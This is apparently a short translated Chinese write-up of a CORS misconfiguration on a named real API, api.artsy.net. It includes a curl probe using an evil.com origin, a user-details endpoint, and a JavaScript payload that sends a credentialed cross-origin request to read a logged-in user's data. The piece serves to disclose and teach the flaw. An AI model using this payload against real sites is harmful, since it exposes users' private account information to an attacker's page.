漏洞:跨域请求
难度:低
大家好!几个月来我测试了许多不同站点的CORS(跨域资源共享)问题,以便我能更实际的了解它。如果想要测试一个站点是否存在CORS漏洞,我们先用curl来检测
1
| curl https://api.artsy.net -H "Origin: https://evil.com" -I
|
data:image/s3,"s3://crabby-images/2d07d/2d07d8caf6f4e20d37908a3fef409d11720133d2" alt=""
正如您所见,Curl请求的响应包括如下所示,这意味着该站点存在CORS漏洞
1 2
| Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://evil.com
|
现在需要做的就是找一个能获取用户信息的API接口,然后构建我们的EXP站点
1
| https://api.artsy.net/api/user_details/user
|
[*]payload代码
1 2 3 4 5 6 7 8 9 10 11 12
| function cors() { var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { document.getElementById("demo").innerHTML = alert(this.responseText); } }; xhttp.open("GET", "https://api.artsy.net/api/user_details/<User-ID>", true); xhttp.withCredentials = true; xhttp.send(); }
|
data:image/s3,"s3://crabby-images/b322e/b322e1fc881b2ff47b3d577bc0384415ae6dd7a9" alt=""
##
打赏译者
data:image/s3,"s3://crabby-images/24c2d/24c2d6b1c46ec973ce4c418f8b0c9474a9379a54" alt=""